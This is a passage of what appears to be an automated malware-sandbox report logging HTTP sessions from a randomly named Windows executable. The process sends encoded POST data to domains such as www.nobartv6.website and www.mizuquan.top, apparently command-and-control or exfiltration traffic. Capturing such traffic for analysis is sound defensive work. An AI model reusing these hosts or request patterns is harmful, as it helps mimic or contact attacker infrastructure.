                                                    Data Ascii: y0qt3F=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w94k9kVeeRFPK1zuTu7OxJTFDYB/8428iLRBH9R2f4R9Mm82Y4SG4L1C3UduQRW4P/iP3ErLpKnvGnQ9eelKXadN0o0iPXXUO9nHnlvG9zCTdy+qHNVS2otQN9QzXJKtdVdQsr2tixpaRoQjenU306lvN/NmzbJcA2rW0NnFtpnMRQeQ+s1tFkxXdOfWtqxZfupW0BdgBdVkVgb8T0VN0CARPEa2eWDsU62DgpJ57lT4YsRqvQbBU/KWFi8F5A/2FRfPeIqbieGAf/juB5+ADTHEkyEYlQ9veWf+0fV2P0C/dLqHL8X3VRdkKD4GBBl4/ao7EgXLQTAPHjEtiMyRCe1lSH3Rl/D64A0UZes7X8BMp/9FxRadrZtXFsuBUW+st3s9aUZHsKdna3N47CEN1QD23l1Hhk9yQf7o0+TaQS4FNQywn33ur7oyOWgdLaWrlrkrwD0wSMt1dehXpLtMxgfHbe1sJ4DaEkxmRvc8697CtdYOzZtkA7BODAHN0MdbY0pNRDC+hjhVJUFjTpGyy2S/Ufh/dsohklDjDWxgv9d5yq8SvaKl4ia98lNodu1NWZpzQTIUv9PKG91/ls7vUSBUtrsYFOJl3of4569WgA7+JNjwd1H3myycp0vLSOZJhb/UnV35WiXCLBBbB+wQiv6g2KsMKku8rdW5olPbZpayhkHB4+d6hbUmn1/usoHQ67OEh+YwtJttQWz/yBqvtrrAB4PQ0UmSTFeP0uGijrJXuPWoSS6BY+eyNeeEAK0RkW74d043jEe26AFeSM7B2lMrwPE8BQUDdd7CXzAWLCWLvVeFq6w4RjiGW0jV0bQdnuZ02quQeO0KePZDP7TuotR94aVnG5B4zjiaK0LXnMf8Y8wj77197iyj4bdXiTz5RY/ANMbjocOhY3KNWCmJEbiPJuu4ITO0ZtDEFZy72i7+d1wkdsPE+Er/sbFK+fFaLrl8N [TRUNCATED]
                                                    Sep 26, 2024 09:26:13.288069010 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:13 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.44977343.242.202.169801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:14.937247992 CEST542OUTGET /e0nr/?y0qt3F=K/5K1kUHGJjjXPw2ZEkIjVgmoRaszrgI6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txK3JHWMG30o4pyFBBCDSCP6CBkBrnoqSCbT0=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mizuquan.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:26:16.665250063 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:15 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                    Sep 26, 2024 09:26:16.665829897 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:15 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                    Sep 26, 2024 09:26:16.666527033 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:15 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.449774103.224.182.242801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:22.624286890 CEST822OUTPOST /pp43/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.nobartv6.website
                                                    Origin: http://www.nobartv6.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.nobartv6.website/pp43/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6d 57 79 55 2f 72 32 54 6e 52 34 4f 43 34 6f 44 57 2f 38 6b 68 4b 35 71 71 76 73 35 67 41 52 5a 47 76 47 33 5a 72 2f 38 69 75 52 54 43 69 35 58 4d 33 68 72 50 78 6c 30 72 70 63 57 4e 41 47 6a 49 66 43 74 46 75 33 45 6d 37 65 78 4c 6b 68 70 4b 33 32 51 63 45 43 70 63 44 7a 69 31 6c 2f 6a 68 51 58 6b 38 45 46 6b 5a 51 6c 66 66 46 4c 77 4a 4f 71 4c 49 44 56 2f 56 71 64 77 70 39 53 6f 68 75 65 46 56 7a 42 4f 47 78 6e 79 54 51 7a 30 51 49 52 77 73 51 37 30 4a 61 41 68 49 56 54 35 41 7a 36 7a 68 56 43 33 4e 49 37 2f 77 50 46 32 30 46 54 73 4b 51 3d 3d
                                                    Data Ascii: y0qt3F=ywbiYQ/q4W1CmWyU/r2TnR4OC4oDW/8khK5qqvs5gARZGvG3Zr/8iuRTCi5XM3hrPxl0rpcWNAGjIfCtFu3Em7exLkhpK32QcECpcDzi1l/jhQXk8EFkZQlffFLwJOqLIDV/Vqdwp9SohueFVzBOGxnyTQz0QIRwsQ70JaAhIVT5Az6zhVC3NI7/wPF20FTsKQ==
                                                    Sep 26, 2024 09:26:23.209619999 CEST876INHTTP/1.1 200 OK
                                                    date: Thu, 26 Sep 2024 07:26:23 GMT
                                                    server: Apache
                                                    set-cookie: __tad=1727335583.8586432; expires=Sun, 24-Sep-2034 07:26:23 GMT; Max-Age=315360000
                                                    vary: Accept-Encoding
                                                    content-encoding: gzip
                                                    content-length: 581
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                    Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.449775103.224.182.242801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:25.173876047 CEST842OUTPOST /pp43/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.nobartv6.website
                                                    Origin: http://www.nobartv6.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.nobartv6.website/pp43/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 6c 5a 66 4e 65 33 4c 5a 48 38 6c 75 52 54 4a 43 35 53 43 58 67 47 50 32 74 38 72 6f 77 57 4e 41 36 6a 49 65 79 74 46 64 66 4c 33 37 65 7a 43 45 68 6e 46 58 32 51 63 45 43 70 63 43 58 4d 31 6a 58 6a 67 6c 66 6b 2b 6c 46 72 52 77 6c 59 50 31 4c 77 4e 4f 71 50 49 44 56 4a 56 72 42 65 70 34 65 6f 68 73 47 46 57 69 42 4a 64 68 6e 34 64 77 7a 69 5a 35 34 72 72 7a 4f 45 50 71 4d 50 4b 31 72 4f 42 31 72 70 77 6b 6a 67 66 49 66 4d 74 49 4d 43 35 47 75 6c 52 58 68 46 45 34 68 69 44 42 66 6b 36 38 39 45 4f 6a 66 39 69 61 55 3d
                                                    Data Ascii: y0qt3F=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThylZfNe3LZH8luRTJC5SCXgGP2t8rowWNA6jIeytFdfL37ezCEhnFX2QcECpcCXM1jXjglfk+lFrRwlYP1LwNOqPIDVJVrBep4eohsGFWiBJdhn4dwziZ54rrzOEPqMPK1rOB1rpwkjgfIfMtIMC5GulRXhFE4hiDBfk689EOjf9iaU=
                                                    Sep 26, 2024 09:26:25.747320890 CEST876INHTTP/1.1 200 OK
                                                    date: Thu, 26 Sep 2024 07:26:25 GMT
                                                    server: Apache
                                                    set-cookie: __tad=1727335585.2645835; expires=Sun, 24-Sep-2034 07:26:25 GMT; Max-Age=315360000
                                                    vary: Accept-Encoding
                                                    content-encoding: gzip
                                                    content-length: 581
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                    Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.449776103.224.182.242801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:26:27.727941990 CEST10924OUTPOST /pp43/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.nobartv6.website
                                                    Origin: http://www.nobartv6.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.nobartv6.website/pp43/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 64 5a 44 75 57 33 5a 4f 54 38 6b 75 52 54 41 69 35 54 43 58 68 45 50 77 46 34 72 6f 4d 47 4e 47 2b 6a 4a 39 71 74 4f 4d 66 4c 75 72 65 7a 64 55 68 6d 4b 33 33 4b 63 45 53 74 63 44 6e 4d 31 6a 58 6a 67 69 76 6b 33 55 46 72 58 77 6c 66 66 46 4c 38 4a 4f 71 6a 49 44 4e 5a 56 6f 74 67 6f 4d 69 6f 68 4d 57 46 47 41 5a 4a 52 68 6e 2b 61 77 79 68 5a 35 6b 4f 72 7a 54 39 50 70 51 6c 4b 32 33 4f 43 69 65 4f 74 67 2f 50 43 6f 33 70 78 49 64 69 77 47 36 7a 49 51 70 41 43 4b 34 39 63 46 50 79 38 66 63 49 56 32 66 35 78 74 49 44 56 77 4e 79 73 47 73 58 59 58 4d 50 4b 2b 66 34 35 49 4a 34 73 4d 36 35 59 66 47 4e 33 56 4c 4f 49 53 33 5a 53 46 75 52 7a 32 64 70 78 61 52 39 7a 33 71 69 5a 30 42 6c 50 59 76 63 78 5a 52 43 48 4c 55 76 6b 37 7a 70 69 37 55 32 38 46 78 4d 64 4f 42 61 6c 4a 41 48 48 4e 30 31 55 73 38 44 39 30 69 4a 30 65 6e 6d 78 51 31 45 73 35 64 47 51 70 65 [TRUNCATED]
                                                    Data Ascii: y0qt3F=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThydZDuW3ZOT8kuRTAi5TCXhEPwF4roMGNG+jJ9qtOMfLurezdUhmK33KcEStcDnM1jXjgivk3UFrXwlffFL8JOqjIDNZVotgoMiohMWFGAZJRhn+awyhZ5kOrzT9PpQlK23OCieOtg/PCo3pxIdiwG6zIQpACK49cFPy8fcIV2f5xtIDVwNysGsXYXMPK+f45IJ4sM65YfGN3VLOIS3ZSFuRz2dpxaR9z3qiZ0BlPYvcxZRCHLUvk7zpi7U28FxMdOBalJAHHN01Us8D90iJ0enmxQ1Es5dGQpetQr4f7Rf7JJIiYG+UJ4B2CADRs/wV9D3d7Pf6wVcxkDoyCYzAA3oC+aapmzmCynPt7+24sz8yVrj0uhKP4GqOCkG530muAYcMlCVmbtnLKqHvQ8LYKOs0y2c9g/Dxui8ibZt1U5BAX5A9F0hG/kkanYg0kNdwEynugnBmkokE1cFlhpeZCYFJagPsYbNz3YJ1ccIPb/tUm5YG1r6lfNvhqN5MqkcagGMXUuXpP+Whtjg0Yj7DS56aUxwhd2TBtwtdGPvLc0Ljgkno2PTQK+KEXelKZWanG0HSDDF0nYtyGlMVNcWrCEDbbgQn3Uvc0XX94Ab+c8Lr2Mh3Xz8sFmKNCieA0BewjZkGlzaL0TBSxjGdWKmuJ2eGcuDFnSPEdmhfxKVtFKyeLQDUgG69lPT9CW4BZ5sSmNsPfcC5B7oYk+LjChN094zsXbRCS075dOs0MRcK13CHPqJqQymA8+Sen2Xau1LvV6O2movPL5MRk0AiCEfLKgn/HmbexotRkpazVF0f16RZSjfg2IWzDBo/vN3lGmGtUxa4naZFuaHHsLnr+HuqvmwPuceXHC6p3AHb8nxce6dB5f7dsK2vl5zXVJy6xInVywrKOTkBN6jUDp9gv8avoXWz5ivIi8UAIsw8a4eM19EKhJZjCX1309s9rJa8HSun1TyGR [TRUNCATED]
                                                    Sep 26, 2024 09:26:28.315099001 CEST876INHTTP/1.1 200 OK
                                                    date: Thu, 26 Sep 2024 07:26:28 GMT
                                                    server: Apache
                                                    set-cookie: __tad=1727335588.3604621; expires=Sun, 24-Sep-2034 07:26:28 GMT; Max-Age=315360000
                                                    vary: Accept-Encoding
                                                    content-encoding: gzip
                                                    content-length: 581
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                    Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
